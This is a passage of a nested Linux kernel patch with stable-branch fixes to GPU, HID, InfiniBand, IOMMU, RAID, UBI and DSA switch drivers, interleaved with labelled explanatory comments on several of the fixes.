+ 	amdgpu_dm_smu_write_watermarks_table(adev);
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 839a812e0da32..fbc4d706748b7 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -2081,36 +2081,41 @@ static int sienna_cichlid_display_disable_memory_clock_switch(struct smu_context
+ 	return ret;
+ }
+ 
++#define MAX(a, b)	((a) > (b) ? (a) : (b))
++
+ static int sienna_cichlid_update_pcie_parameters(struct smu_context *smu,
+ 					 uint32_t pcie_gen_cap,
+ 					 uint32_t pcie_width_cap)
+ {
+ 	struct smu_11_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+ 	struct smu_11_0_pcie_table *pcie_table = &dpm_context->dpm_tables.pcie_table;
+-	u32 smu_pcie_arg;
++	uint8_t *table_member1, *table_member2;
++	uint32_t min_gen_speed, max_gen_speed;
++	uint32_t min_lane_width, max_lane_width;
++	uint32_t smu_pcie_arg;
+ 	int ret, i;
+ 
+-	/* PCIE gen speed and lane width override */
+-	if (!amdgpu_device_pcie_dynamic_switching_supported()) {
+-		if (pcie_table->pcie_gen[NUM_LINK_LEVELS - 1] < pcie_gen_cap)
+-			pcie_gen_cap = pcie_table->pcie_gen[NUM_LINK_LEVELS - 1];
++	GET_PPTABLE_MEMBER(PcieGenSpeed, &table_member1);
++	GET_PPTABLE_MEMBER(PcieLaneCount, &table_member2);
+ 
+-		if (pcie_table->pcie_lane[NUM_LINK_LEVELS - 1] < pcie_width_cap)
+-			pcie_width_cap = pcie_table->pcie_lane[NUM_LINK_LEVELS - 1];
++	min_gen_speed = MAX(0, table_member1[0]);
++	max_gen_speed = MIN(pcie_gen_cap, table_member1[1]);
++	min_gen_speed = min_gen_speed > max_gen_speed ?
++			max_gen_speed : min_gen_speed;
++	min_lane_width = MAX(1, table_member2[0]);
++	max_lane_width = MIN(pcie_width_cap, table_member2[1]);
++	min_lane_width = min_lane_width > max_lane_width ?
++			 max_lane_width : min_lane_width;
+ 
+-		/* Force all levels to use the same settings */
+-		for (i = 0; i < NUM_LINK_LEVELS; i++) {
+-			pcie_table->pcie_gen[i] = pcie_gen_cap;
+-			pcie_table->pcie_lane[i] = pcie_width_cap;
+-		}
++	if (!amdgpu_device_pcie_dynamic_switching_supported()) {
++		pcie_table->pcie_gen[0] = max_gen_speed;
++		pcie_table->pcie_lane[0] = max_lane_width;
+ 	} else {
+-		for (i = 0; i < NUM_LINK_LEVELS; i++) {
+-			if (pcie_table->pcie_gen[i] > pcie_gen_cap)
+-				pcie_table->pcie_gen[i] = pcie_gen_cap;
+-			if (pcie_table->pcie_lane[i] > pcie_width_cap)
+-				pcie_table->pcie_lane[i] = pcie_width_cap;
+-		}
++		pcie_table->pcie_gen[0] = min_gen_speed;
++		pcie_table->pcie_lane[0] = min_lane_width;
+ 	}
++	pcie_table->pcie_gen[1] = max_gen_speed;
++	pcie_table->pcie_lane[1] = max_lane_width;
+ 
+ 	for (i = 0; i < NUM_LINK_LEVELS; i++) {
+ 		smu_pcie_arg = (i << 16 |
+diff --git a/drivers/hid/hid-sony.c b/drivers/hid/hid-sony.c
+index 03691cdcfb8e1..f7f7252d839ee 100644
+--- a/drivers/hid/hid-sony.c
++++ b/drivers/hid/hid-sony.c
+@@ -3074,6 +3074,8 @@ static int sony_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	return ret;
+ 
+ err:
++	usb_free_urb(sc->ghl_urb);
++
+ 	hid_hw_stop(hdev);
+ 	return ret;
+ }
+diff --git a/drivers/hid/intel-ish-hid/ipc/pci-ish.c b/drivers/hid/intel-ish-hid/ipc/pci-ish.c
+index 55cb25038e632..710fda5f19e1c 100644
+--- a/drivers/hid/intel-ish-hid/ipc/pci-ish.c
++++ b/drivers/hid/intel-ish-hid/ipc/pci-ish.c
+@@ -133,6 +133,14 @@ static int enable_gpe(struct device *dev)
+ 	}
+ 	wakeup = &adev->wakeup;
+ 
++	/*
++	 * Call acpi_disable_gpe() so that the reference count
++	 * gpe_event_info->runtime_count doesn't overflow.
++	 * When gpe_event_info->runtime_count = 0, the call
++	 * to acpi_disable_gpe() simply returns.
++	 */
++	acpi_disable_gpe(wakeup->gpe_device, wakeup->gpe_number);
++
+ 	acpi_sts = acpi_enable_gpe(wakeup->gpe_device, wakeup->gpe_number);
+ 	if (ACPI_FAILURE(acpi_sts)) {
+ 		dev_err(dev, "enable ose_gpe failed\n");
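+/*
+ * Illustrative sketch, not part of the patch above: acpi_enable_gpe()
+ * and acpi_disable_gpe() maintain a reference count, and enable_gpe()
+ * can run on every resume. Pairing each enable with a preceding disable
+ * (a no-op at count 0) keeps runtime_count from growing without bound.
+ */
+#include <linux/acpi.h>
+
+static void sketch_rearm_gpe(struct acpi_device *adev)
+{
+	struct acpi_device_wakeup *wakeup = &adev->wakeup;
+
+	/* Drop the count taken by a previous resume, if any. */
+	acpi_disable_gpe(wakeup->gpe_device, wakeup->gpe_number);
+	acpi_enable_gpe(wakeup->gpe_device, wakeup->gpe_number);
+}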
+diff --git a/drivers/hwmon/nzxt-smart2.c b/drivers/hwmon/nzxt-smart2.c
+index 533f38b0b4e9b..a8e72d8fd0605 100644
+--- a/drivers/hwmon/nzxt-smart2.c
++++ b/drivers/hwmon/nzxt-smart2.c
+@@ -791,6 +791,8 @@ static const struct hid_device_id nzxt_smart2_hid_id_table[] = {
+ 	{ HID_USB_DEVICE(0x1e71, 0x2009) }, /* NZXT RGB & Fan Controller */
+ 	{ HID_USB_DEVICE(0x1e71, 0x200e) }, /* NZXT RGB & Fan Controller */
+ 	{ HID_USB_DEVICE(0x1e71, 0x2010) }, /* NZXT RGB & Fan Controller */
++	{ HID_USB_DEVICE(0x1e71, 0x2011) }, /* NZXT RGB & Fan Controller (6 RGB) */
++	{ HID_USB_DEVICE(0x1e71, 0x2019) }, /* NZXT RGB & Fan Controller (6 RGB) */
+ 	{},
+ };
+ 
+diff --git a/drivers/idle/intel_idle.c b/drivers/idle/intel_idle.c
+index cfeb24d40d378..bb3d10099ba44 100644
+--- a/drivers/idle/intel_idle.c
++++ b/drivers/idle/intel_idle.c
+@@ -1430,6 +1430,7 @@ static const struct x86_cpu_id intel_idle_ids[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_L,		&idle_cpu_adl_l),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_N,		&idle_cpu_adl_n),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X,	&idle_cpu_spr),
++	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X,	&idle_cpu_spr),
+ 	X86_MATCH_INTEL_FAM6_MODEL(XEON_PHI_KNL,	&idle_cpu_knl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(XEON_PHI_KNM,	&idle_cpu_knl),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ATOM_GOLDMONT,	&idle_cpu_bxt),
+@@ -1862,6 +1863,7 @@ static void __init intel_idle_init_cstates_icpu(struct cpuidle_driver *drv)
+ 		skx_idle_state_table_update();
+ 		break;
+ 	case INTEL_FAM6_SAPPHIRERAPIDS_X:
++	case INTEL_FAM6_EMERALDRAPIDS_X:
+ 		spr_idle_state_table_update();
+ 		break;
+ 	case INTEL_FAM6_ALDERLAKE:
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index 4632b1833381a..0773ca7ace247 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -4936,7 +4936,7 @@ static int cma_iboe_join_multicast(struct rdma_id_private *id_priv,
+ 	int err = 0;
+ 	struct sockaddr *addr = (struct sockaddr *)&mc->addr;
+ 	struct net_device *ndev = NULL;
+-	struct ib_sa_multicast ib;
++	struct ib_sa_multicast ib = {};
+ 	enum ib_gid_type gid_type;
+ 	bool send_only;
+ 
+diff --git a/drivers/infiniband/core/cma_configfs.c b/drivers/infiniband/core/cma_configfs.c
+index 7b68b3ea979f7..f2fb2d8a65970 100644
+--- a/drivers/infiniband/core/cma_configfs.c
++++ b/drivers/infiniband/core/cma_configfs.c
+@@ -217,7 +217,7 @@ static int make_cma_ports(struct cma_dev_group *cma_dev_group,
+ 		return -ENOMEM;
+ 
+ 	for (i = 0; i < ports_num; i++) {
+-		char port_str[10];
++		char port_str[11];
+ 
+ 		ports[i].port_num = i + 1;
+ 		snprintf(port_str, sizeof(port_str), "%u", i + 1);
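+/*
+ * Illustrative note, not part of the patch above: a u32 printed with
+ * "%u" can need up to 10 digits (4294967295) plus the terminating NUL,
+ * so char port_str[10] truncates the largest values (and newer
+ * compilers warn about it); [11] is the minimal safe size:
+ *
+ *	char port_str[11];
+ *	snprintf(port_str, sizeof(port_str), "%u", i + 1);
+ */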
+diff --git a/drivers/infiniband/core/nldev.c b/drivers/infiniband/core/nldev.c
+index 222733a83ddb7..1adf20198afd1 100644
+--- a/drivers/infiniband/core/nldev.c
++++ b/drivers/infiniband/core/nldev.c
+@@ -2501,6 +2501,7 @@ static const struct rdma_nl_cbs nldev_cb_table[RDMA_NLDEV_NUM_OPS] = {
+ 	},
+ 	[RDMA_NLDEV_CMD_SYS_SET] = {
+ 		.doit = nldev_set_sys_set_doit,
++		.flags = RDMA_NL_ADMIN_PERM,
+ 	},
+ 	[RDMA_NLDEV_CMD_STAT_SET] = {
+ 		.doit = nldev_stat_set_doit,
+diff --git a/drivers/infiniband/core/uverbs_main.c b/drivers/infiniband/core/uverbs_main.c
+index fa937cd268219..6fe825800494c 100644
+--- a/drivers/infiniband/core/uverbs_main.c
++++ b/drivers/infiniband/core/uverbs_main.c
+@@ -535,7 +535,7 @@ static ssize_t verify_hdr(struct ib_uverbs_cmd_hdr *hdr,
+ 	if (hdr->in_words * 4 != count)
+ 		return -EINVAL;
+ 
+-	if (count < method_elm->req_size + sizeof(hdr)) {
++	if (count < method_elm->req_size + sizeof(*hdr)) {
+ 		/*
+ 		 * rdma-core v18 and v19 have a bug where they send DESTROY_CQ
+ 		 * with a 16 byte write instead of 24. Old kernels didn't
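+/*
+ * Illustrative note, not part of the patch above: sizeof(hdr) measured
+ * the pointer (8 bytes on 64-bit), not the structure it points to, so
+ * the length check was too permissive. The classic pitfall:
+ *
+ *	struct ib_uverbs_cmd_hdr *hdr;
+ *
+ *	sizeof(hdr)  == sizeof(void *)			(pointer size)
+ *	sizeof(*hdr) == sizeof(struct ib_uverbs_cmd_hdr)	(intended)
+ */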
+diff --git a/drivers/infiniband/hw/mlx4/sysfs.c b/drivers/infiniband/hw/mlx4/sysfs.c
+index 24ee79aa2122e..88f534cf690e9 100644
+--- a/drivers/infiniband/hw/mlx4/sysfs.c
++++ b/drivers/infiniband/hw/mlx4/sysfs.c
+@@ -223,7 +223,7 @@ void del_sysfs_port_mcg_attr(struct mlx4_ib_dev *device, int port_num,
+ static int add_port_entries(struct mlx4_ib_dev *device, int port_num)
+ {
+ 	int i;
+-	char buff[11];
++	char buff[12];
+ 	struct mlx4_ib_iov_port *port = NULL;
+ 	int ret = 0 ;
+ 	struct ib_port_attr attr;
+diff --git a/drivers/infiniband/hw/mlx5/fs.c b/drivers/infiniband/hw/mlx5/fs.c
+index 5a13d902b0641..1022cebd0a46e 100644
+--- a/drivers/infiniband/hw/mlx5/fs.c
++++ b/drivers/infiniband/hw/mlx5/fs.c
+@@ -2471,8 +2471,8 @@ destroy_res:
+ 	mlx5_steering_anchor_destroy_res(ft_prio);
+ put_flow_table:
+ 	put_flow_table(dev, ft_prio, true);
+-	mutex_unlock(&dev->flow_db->lock);
+ free_obj:
++	mutex_unlock(&dev->flow_db->lock);
+ 	kfree(obj);
+ 
+ 	return err;
+diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c
+index 3178df55c4d85..0baf3b5518b46 100644
+--- a/drivers/infiniband/hw/mlx5/main.c
++++ b/drivers/infiniband/hw/mlx5/main.c
+@@ -2074,7 +2074,7 @@ static inline char *mmap_cmd2str(enum mlx5_ib_mmap_cmd cmd)
+ 	case MLX5_IB_MMAP_DEVICE_MEM:
+ 		return "Device Memory";
+ 	default:
+-		return NULL;
++		return "Unknown";
+ 	}
+ }
+ 
+diff --git a/drivers/infiniband/sw/siw/siw_cm.c b/drivers/infiniband/sw/siw/siw_cm.c
+index 552d8271e423b..dc679c34ceefa 100644
+--- a/drivers/infiniband/sw/siw/siw_cm.c
++++ b/drivers/infiniband/sw/siw/siw_cm.c
+@@ -973,6 +973,7 @@ static void siw_accept_newconn(struct siw_cep *cep)
+ 			siw_cep_put(cep);
+ 			new_cep->listen_cep = NULL;
+ 			if (rv) {
++				siw_cancel_mpatimer(new_cep);
+ 				siw_cep_set_free(new_cep);
+ 				goto error;
+ 			}
+@@ -1097,9 +1098,12 @@ static void siw_cm_work_handler(struct work_struct *w)
+ 				/*
+ 				 * Socket close before MPA request received.
+ 				 */
+-				siw_dbg_cep(cep, "no mpareq: drop listener\n");
+-				siw_cep_put(cep->listen_cep);
+-				cep->listen_cep = NULL;
++				if (cep->listen_cep) {
++					siw_dbg_cep(cep,
++						"no mpareq: drop listener\n");
++					siw_cep_put(cep->listen_cep);
++					cep->listen_cep = NULL;
++				}
+ 			}
+ 		}
+ 		release_cep = 1;
+@@ -1222,7 +1226,11 @@ static void siw_cm_llp_data_ready(struct sock *sk)
+ 	if (!cep)
+ 		goto out;
+ 
+-	siw_dbg_cep(cep, "state: %d\n", cep->state);
++	siw_dbg_cep(cep, "cep state: %d, socket state %d\n",
++		    cep->state, sk->sk_state);
++
++	if (sk->sk_state != TCP_ESTABLISHED)
++		goto out;
+ 
+ 	switch (cep->state) {
+ 	case SIW_EPSTATE_RDMA_MODE:
+diff --git a/drivers/infiniband/ulp/srp/ib_srp.c b/drivers/infiniband/ulp/srp/ib_srp.c
+index a7580c4855fec..c4dcef76e9646 100644
+--- a/drivers/infiniband/ulp/srp/ib_srp.c
++++ b/drivers/infiniband/ulp/srp/ib_srp.c
+@@ -2789,7 +2789,6 @@ static int srp_abort(struct scsi_cmnd *scmnd)
+ 	u32 tag;
+ 	u16 ch_idx;
+ 	struct srp_rdma_ch *ch;
+-	int ret;
+ 
+ 	shost_printk(KERN_ERR, target->scsi_host, "SRP abort called\n");
+ 
+@@ -2803,19 +2802,14 @@ static int srp_abort(struct scsi_cmnd *scmnd)
+ 	shost_printk(KERN_ERR, target->scsi_host,
+ 		     "Sending SRP abort for tag %#x\n", tag);
+ 	if (srp_send_tsk_mgmt(ch, tag, scmnd->device->lun,
+-			      SRP_TSK_ABORT_TASK, NULL) == 0)
+-		ret = SUCCESS;
+-	else if (target->rport->state == SRP_RPORT_LOST)
+-		ret = FAST_IO_FAIL;
+-	else
+-		ret = FAILED;
+-	if (ret == SUCCESS) {
++			      SRP_TSK_ABORT_TASK, NULL) == 0) {
+ 		srp_free_req(ch, req, scmnd, 0);
+-		scmnd->result = DID_ABORT << 16;
+-		scsi_done(scmnd);
++		return SUCCESS;
+ 	}
++	if (target->rport->state == SRP_RPORT_LOST)
++		return FAST_IO_FAIL;
+ 
+-	return ret;
++	return FAILED;
+ }
+ 
+ static int srp_reset_device(struct scsi_cmnd *scmnd)
+diff --git a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+index db33dc87f69ed..8966f7d5aab61 100644
+--- a/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
++++ b/drivers/iommu/arm/arm-smmu-v3/arm-smmu-v3.c
+@@ -1886,13 +1886,23 @@ static void __arm_smmu_tlb_inv_range(struct arm_smmu_cmdq_ent *cmd,
+ 		/* Get the leaf page size */
+ 		tg = __ffs(smmu_domain->domain.pgsize_bitmap);
+ 
++		num_pages = size >> tg;
++
+ 		/* Convert page size of 12,14,16 (log2) to 1,2,3 */
+ 		cmd->tlbi.tg = (tg - 10) / 2;
+ 
+-		/* Determine what level the granule is at */
+-		cmd->tlbi.ttl = 4 - ((ilog2(granule) - 3) / (tg - 3));
+-
+-		num_pages = size >> tg;
++		/*
++		 * Determine what level the granule is at. For non-leaf, both
++		 * io-pgtable and SVA pass a nominal last-level granule because
++		 * they don't know what level(s) actually apply, so ignore that
++		 * and leave TTL=0. However for various errata reasons we still
++		 * want to use a range command, so avoid the SVA corner case
++		 * where both scale and num could be 0 as well.
++		 */
++		if (cmd->tlbi.leaf)
++			cmd->tlbi.ttl = 4 - ((ilog2(granule) - 3) / (tg - 3));
++		else if ((num_pages & CMDQ_TLBI_RANGE_NUM_MAX) == 1)
++			num_pages++;
+ 	}
+ 
+ 	cmds.num = 0;
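+/*
+ * Illustrative note, not part of the patch above: worked example of the
+ * range-TLBI encoding for a 4K leaf granule. tg = log2(4096) = 12, so
+ * cmd->tlbi.tg = (12 - 10) / 2 = 1; for leaf invalidation of 2M blocks,
+ * ilog2(granule) = 21 and ttl = 4 - ((21 - 3) / (12 - 3)) = 2, i.e.
+ * level-2 entries. Non-leaf callers now leave ttl = 0 ("level unknown")
+ * instead of deriving it from a granule they only guessed.
+ */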
+diff --git a/drivers/iommu/intel/iommu.c b/drivers/iommu/intel/iommu.c
+index d4b5d20bd6dda..5c4f5aa8e87e4 100644
+--- a/drivers/iommu/intel/iommu.c
++++ b/drivers/iommu/intel/iommu.c
+@@ -3163,13 +3163,6 @@ static int iommu_suspend(void)
+ 	struct intel_iommu *iommu = NULL;
+ 	unsigned long flag;
+ 
+-	for_each_active_iommu(iommu, drhd) {
+-		iommu->iommu_state = kcalloc(MAX_SR_DMAR_REGS, sizeof(u32),
+-					     GFP_KERNEL);
+-		if (!iommu->iommu_state)
+-			goto nomem;
+-	}
+-
+ 	iommu_flush_all();
+ 
+ 	for_each_active_iommu(iommu, drhd) {
+@@ -3189,12 +3182,6 @@ static int iommu_suspend(void)
+ 		raw_spin_unlock_irqrestore(&iommu->register_lock, flag);
+ 	}
+ 	return 0;
+-
+-nomem:
+-	for_each_active_iommu(iommu, drhd)
+-		kfree(iommu->iommu_state);
+-
+-	return -ENOMEM;
+ }
+ 
+ static void iommu_resume(void)
+@@ -3226,9 +3213,6 @@ static void iommu_resume(void)
+ 
+ 		raw_spin_unlock_irqrestore(&iommu->register_lock, flag);
+ 	}
+-
+-	for_each_active_iommu(iommu, drhd)
+-		kfree(iommu->iommu_state);
+ }
+ 
+ static struct syscore_ops iommu_syscore_ops = {
+diff --git a/drivers/iommu/intel/iommu.h b/drivers/iommu/intel/iommu.h
+index db9df7c3790cd..c99cb715bd9a2 100644
+--- a/drivers/iommu/intel/iommu.h
++++ b/drivers/iommu/intel/iommu.h
+@@ -595,7 +595,7 @@ struct intel_iommu {
+ 	struct iopf_queue *iopf_queue;
+ 	unsigned char iopfq_name[16];
+ 	struct q_inval  *qi;            /* Queued invalidation info */
+-	u32 *iommu_state; /* Store iommu states between suspend and resume.*/
++	u32 iommu_state[MAX_SR_DMAR_REGS]; /* Store iommu states between suspend and resume. */
+ 
+ #ifdef CONFIG_IRQ_REMAP
+ 	struct ir_table *ir_table;	/* Interrupt remapping info */
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index 9673cd60c84fc..0ba2a63a9538a 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -223,7 +223,7 @@ struct mtk_iommu_data {
+ 	struct device			*smicomm_dev;
+ 
+ 	struct mtk_iommu_bank_data	*bank;
+-	struct mtk_iommu_domain		*share_dom; /* For 2 HWs share pgtable */
++	struct mtk_iommu_domain		*share_dom;
+ 
+ 	struct regmap			*pericfg;
+ 	struct mutex			mutex; /* Protect m4u_group/m4u_dom above */
+@@ -579,8 +579,8 @@ static int mtk_iommu_domain_finalise(struct mtk_iommu_domain *dom,
+ 	struct mtk_iommu_domain	*share_dom = data->share_dom;
+ 	const struct mtk_iommu_iova_region *region;
+ 
+-	/* Always use share domain in sharing pgtable case */
+-	if (MTK_IOMMU_HAS_FLAG(data->plat_data, SHARE_PGTABLE) && share_dom) {
++	/* Share pgtable when 2 MM IOMMUs share the pgtable or one IOMMU uses multiple iova ranges */
++	if (share_dom) {
+ 		dom->iop = share_dom->iop;
+ 		dom->cfg = share_dom->cfg;
+ 		dom->domain.pgsize_bitmap = share_dom->cfg.pgsize_bitmap;
+@@ -613,8 +613,7 @@ static int mtk_iommu_domain_finalise(struct mtk_iommu_domain *dom,
+ 	/* Update our support page sizes bitmap */
+ 	dom->domain.pgsize_bitmap = dom->cfg.pgsize_bitmap;
+ 
+-	if (MTK_IOMMU_HAS_FLAG(data->plat_data, SHARE_PGTABLE))
+-		data->share_dom = dom;
++	data->share_dom = dom;
+ 
+ update_iova_region:
+ 	/* Update the iova region for this domain */
+diff --git a/drivers/leds/led-core.c b/drivers/leds/led-core.c
+index aad8bc44459fe..d94d60b526461 100644
+--- a/drivers/leds/led-core.c
++++ b/drivers/leds/led-core.c
+@@ -424,10 +424,6 @@ int led_compose_name(struct device *dev, struct led_init_data *init_data,
+ 
+ 	led_parse_fwnode_props(dev, fwnode, &props);
+ 
+-	/* We want to label LEDs that can produce full range of colors
+-	 * as RGB, not multicolor */
+-	BUG_ON(props.color == LED_COLOR_ID_MULTI);
+-
+ 	if (props.label) {
+ 		/*
+ 		 * If init_data.devicename is NULL, then it indicates that
+diff --git a/drivers/md/dm-zoned-target.c b/drivers/md/dm-zoned-target.c
+index 95b132b52f332..4abe1e2f8ad81 100644
+--- a/drivers/md/dm-zoned-target.c
++++ b/drivers/md/dm-zoned-target.c
+@@ -748,17 +748,16 @@ err:
+ /*
+  * Cleanup zoned device information.
+  */
+-static void dmz_put_zoned_device(struct dm_target *ti)
++static void dmz_put_zoned_devices(struct dm_target *ti)
+ {
+ 	struct dmz_target *dmz = ti->private;
+ 	int i;
+ 
+-	for (i = 0; i < dmz->nr_ddevs; i++) {
+-		if (dmz->ddev[i]) {
++	for (i = 0; i < dmz->nr_ddevs; i++)
++		if (dmz->ddev[i])
+ 			dm_put_device(ti, dmz->ddev[i]);
+-			dmz->ddev[i] = NULL;
+-		}
+-	}
++
++	kfree(dmz->ddev);
+ }
+ 
+ static int dmz_fixup_devices(struct dm_target *ti)
+@@ -948,7 +947,7 @@ err_bio:
+ err_meta:
+ 	dmz_dtr_metadata(dmz->metadata);
+ err_dev:
+-	dmz_put_zoned_device(ti);
++	dmz_put_zoned_devices(ti);
+ err:
+ 	kfree(dmz->dev);
+ 	kfree(dmz);
+@@ -978,7 +977,7 @@ static void dmz_dtr(struct dm_target *ti)
+ 
+ 	bioset_exit(&dmz->bio_set);
+ 
+-	dmz_put_zoned_device(ti);
++	dmz_put_zoned_devices(ti);
+ 
+ 	mutex_destroy(&dmz->chunk_lock);
+ 
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index fbef3c9badb65..98d4e93efa31c 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -854,6 +854,13 @@ struct stripe_head *raid5_get_active_stripe(struct r5conf *conf,
+ 
+ 		set_bit(R5_INACTIVE_BLOCKED, &conf->cache_state);
+ 		r5l_wake_reclaim(conf->log, 0);
++
++		/* release batch_last before wait to avoid risk of deadlock */
++		if (ctx && ctx->batch_last) {
++			raid5_release_stripe(ctx->batch_last);
++			ctx->batch_last = NULL;
++		}
++
+ 		wait_event_lock_irq(conf->wait_for_stripe,
+ 				    is_inactive_blocked(conf, hash),
+ 				    *(conf->hash_locks + hash));
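+/*
+ * Illustrative sketch, not part of the patch above: the raid5 hunk
+ * releases the cached batch_last stripe before sleeping, since waiting
+ * for a free stripe while pinning one can deadlock when the pool is
+ * exhausted. Generic shape, with hypothetical names:
+ */
+#include <linux/wait.h>
+
+struct sketch_res;
+struct sketch_pool { wait_queue_head_t wait; };
+
+static void sketch_put_res(struct sketch_res *r);
+static bool sketch_pool_has_free(struct sketch_pool *p);
+
+static void sketch_wait_for_res(struct sketch_pool *pool,
+				struct sketch_res **cached)
+{
+	/* Give back what we hold before blocking on the same pool. */
+	if (*cached) {
+		sketch_put_res(*cached);
+		*cached = NULL;
+	}
+
+	wait_event(pool->wait, sketch_pool_has_free(pool));
+}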
+diff --git a/drivers/mtd/ubi/build.c b/drivers/mtd/ubi/build.c
+index 1662c12e24ada..6fbd77dc1d18f 100644
+--- a/drivers/mtd/ubi/build.c
++++ b/drivers/mtd/ubi/build.c
+@@ -893,6 +893,13 @@ int ubi_attach_mtd_dev(struct mtd_info *mtd, int ubi_num,
+ 		return -EINVAL;
+ 	}
+ 
++	/* UBI cannot work on flashes with zero erasesize. */
++	if (!mtd->erasesize) {
++		pr_err("ubi: refuse attaching mtd%d - zero erasesize flash is not supported\n",
++			mtd->index);
++		return -EINVAL;
++	}
++
+ 	if (ubi_num == UBI_DEV_NUM_AUTO) {
+ 		/* Search for an empty slot in the @ubi_devices array */
+ 		for (ubi_num = 0; ubi_num < UBI_MAX_DEVICES; ubi_num++)
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index a73008b9e0b3c..ba906dfab055c 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -3012,14 +3012,16 @@ static void mv88e6xxx_hardware_reset(struct mv88e6xxx_chip *chip)
+ 		 * from the wrong location resulting in the switch booting
+ 		 * to wrong mode and inoperable.
+ 		 */
+-		mv88e6xxx_g1_wait_eeprom_done(chip);
++		if (chip->info->ops->get_eeprom)
++			mv88e6xxx_g2_eeprom_wait(chip);
+ 
+ 		gpiod_set_value_cansleep(gpiod, 1);
+ 		usleep_range(10000, 20000);
+ 		gpiod_set_value_cansleep(gpiod, 0);
+ 		usleep_range(10000, 20000);
+ 
+-		mv88e6xxx_g1_wait_eeprom_done(chip);
++		if (chip->info->ops->get_eeprom)
++			mv88e6xxx_g2_eeprom_wait(chip);
+ 	}
+ }
+ 
+diff --git a/drivers/net/dsa/mv88e6xxx/global1.c b/drivers/net/dsa/mv88e6xxx/global1.c
+index 5848112036b08..964928285782c 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1.c
++++ b/drivers/net/dsa/mv88e6xxx/global1.c
+@@ -75,37 +75,6 @@ static int mv88e6xxx_g1_wait_init_ready(struct mv88e6xxx_chip *chip)
+ 	return mv88e6xxx_g1_wait_bit(chip, MV88E6XXX_G1_STS, bit, 1);
+ }
+ 
+-void mv88e6xxx_g1_wait_eeprom_done(struct mv88e6xxx_chip *chip)
+-{
+-	const unsigned long timeout = jiffies + 1 * HZ;
+-	u16 val;
+-	int err;
+-
+-	/* Wait up to 1 second for the switch to finish reading the
+-	 * EEPROM.
+-	 */
+-	while (time_before(jiffies, timeout)) {
+-		err = mv88e6xxx_g1_read(chip, MV88E6XXX_G1_STS, &val);
+-		if (err) {
+-			dev_err(chip->dev, "Error reading status");
+-			return;
+-		}
+-
+-		/* If the switch is still resetting, it may not
+-		 * respond on the bus, and so MDIO read returns
+-		 * 0xffff. Differentiate between that, and waiting for
+-		 * the EEPROM to be done by bit 0 being set.
+-		 */
+-		if (val != 0xffff &&
+-		    val & BIT(MV88E6XXX_G1_STS_IRQ_EEPROM_DONE))
+-			return;
+-
+-		usleep_range(1000, 2000);
+-	}
+-
+-	dev_err(chip->dev, "Timeout waiting for EEPROM done");
+-}
+-
+ /* Offset 0x01: Switch MAC Address Register Bytes 0 & 1
+  * Offset 0x02: Switch MAC Address Register Bytes 2 & 3
+  * Offset 0x03: Switch MAC Address Register Bytes 4 & 5
+diff --git a/drivers/net/dsa/mv88e6xxx/global1.h b/drivers/net/dsa/mv88e6xxx/global1.h
+index 65958b2a0d3a3..04b57a21f7868 100644
+--- a/drivers/net/dsa/mv88e6xxx/global1.h
++++ b/drivers/net/dsa/mv88e6xxx/global1.h
+@@ -281,7 +281,6 @@ int mv88e6xxx_g1_set_switch_mac(struct mv88e6xxx_chip *chip, u8 *addr);
+ int mv88e6185_g1_reset(struct mv88e6xxx_chip *chip);
+ int mv88e6352_g1_reset(struct mv88e6xxx_chip *chip);
+ int mv88e6250_g1_reset(struct mv88e6xxx_chip *chip);
+-void mv88e6xxx_g1_wait_eeprom_done(struct mv88e6xxx_chip *chip);
+ 
+ int mv88e6185_g1_ppu_enable(struct mv88e6xxx_chip *chip);
+ int mv88e6185_g1_ppu_disable(struct mv88e6xxx_chip *chip);
+diff --git a/drivers/net/dsa/mv88e6xxx/global2.c b/drivers/net/dsa/mv88e6xxx/global2.c
+index ec49939968fac..ac302a935ce69 100644
+--- a/drivers/net/dsa/mv88e6xxx/global2.c
++++ b/drivers/net/dsa/mv88e6xxx/global2.c
+@@ -340,7 +340,7 @@ int mv88e6xxx_g2_pot_clear(struct mv88e6xxx_chip *chip)
+  * Offset 0x15: EEPROM Addr (for 8-bit data access)
+  */
+ 
+-static int mv88e6xxx_g2_eeprom_wait(struct mv88e6xxx_chip *chip)
++int mv88e6xxx_g2_eeprom_wait(struct mv88e6xxx_chip *chip)
+ {
+ 	int bit = __bf_shf(MV88E6XXX_G2_EEPROM_CMD_BUSY);
+ 	int err;
+diff --git a/drivers/net/dsa/mv88e6xxx/global2.h b/drivers/net/dsa/mv88e6xxx/global2.h
+index c05fad5c9f19d..751a6c988de42 100644
+--- a/drivers/net/dsa/mv88e6xxx/global2.h
++++ b/drivers/net/dsa/mv88e6xxx/global2.h
